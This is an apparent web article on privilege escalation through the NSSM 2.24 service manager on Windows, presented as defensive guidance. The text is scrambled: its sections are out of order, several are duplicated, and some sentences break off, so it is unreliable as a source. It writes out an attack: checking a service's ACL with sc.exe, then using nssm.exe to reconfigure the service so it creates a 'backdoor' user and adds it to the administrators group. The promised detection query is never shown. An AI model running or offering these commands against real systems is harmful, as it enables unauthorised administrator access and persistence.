After reading this article, your next step should be running a simple PowerShell query across your Windows estate:
Until then, variants will continue to appear in red team toolkits. The responsibility falls squarely on defenders to audit service permissions and restrict NSSM execution. Conclusion The updated findings around NSSM-224 remind us that privilege escalation is rarely about 0-days. Instead, it leverages legacy utilities, misconfigured ACLs, and blind spots in endpoint detection. NSSM 2.24 remains an effective escalation vector—not because it is malicious, but because it is trusted.
REM Step 3: Modify service to run malicious payload C:\Users\Public\nssm.exe set VulnService AppParameters "C:\Windows\System32\cmd.exe /c net users backdoor P@ssw0rd /add && net localgroup administrators backdoor /add"
However, recent Windows 11 Insider builds present a new prompt when ChangeServiceConfig is called by a non-system process with a modified binary path. This is not yet backported to Server 2022 or Windows 10.
This article provides a deep dive into the mechanics of the NSSM-224 privilege escalation, why it remains effective against partially patched systems, and how defenders can detect and mitigate the risk—even as Microsoft continues to refine Windows service security. What Is NSSM? A Quick Refresher The Non-Sucking Service Manager ( nssm.exe ) is a legitimate, open-source utility designed to run any executable as a Windows service. Unlike sc.exe or PowerShell’s New-Service , NSSM handles service failure recovery, environment variables, and graceful shutdowns. It is widely deployed by system administrators to convert batch scripts, Node.js apps, or Python daemons into persistent services.
# Check for vulnerable service sc.exe sdshow VulnService # Look for (A;;CCLCSWLOCRRC;;;AU) - Authenticated Users can change config If found, the attacker runs:
Nssm224 Privilege Escalation Updated May 2026
After reading this article, your next step should be running a simple PowerShell query across your Windows estate:
Until then, variants will continue to appear in red team toolkits. The responsibility falls squarely on defenders to audit service permissions and restrict NSSM execution. Conclusion The updated findings around NSSM-224 remind us that privilege escalation is rarely about 0-days. Instead, it leverages legacy utilities, misconfigured ACLs, and blind spots in endpoint detection. NSSM 2.24 remains an effective escalation vector—not because it is malicious, but because it is trusted. nssm224 privilege escalation updated
REM Step 3: Modify service to run malicious payload C:\Users\Public\nssm.exe set VulnService AppParameters "C:\Windows\System32\cmd.exe /c net users backdoor P@ssw0rd /add && net localgroup administrators backdoor /add" After reading this article, your next step should
However, recent Windows 11 Insider builds present a new prompt when ChangeServiceConfig is called by a non-system process with a modified binary path. This is not yet backported to Server 2022 or Windows 10. This is not yet backported to Server 2022 or Windows 10
This article provides a deep dive into the mechanics of the NSSM-224 privilege escalation, why it remains effective against partially patched systems, and how defenders can detect and mitigate the risk—even as Microsoft continues to refine Windows service security. What Is NSSM? A Quick Refresher The Non-Sucking Service Manager ( nssm.exe ) is a legitimate, open-source utility designed to run any executable as a Windows service. Unlike sc.exe or PowerShell’s New-Service , NSSM handles service failure recovery, environment variables, and graceful shutdowns. It is widely deployed by system administrators to convert batch scripts, Node.js apps, or Python daemons into persistent services.
# Check for vulnerable service sc.exe sdshow VulnService # Look for (A;;CCLCSWLOCRRC;;;AU) - Authenticated Users can change config If found, the attacker runs: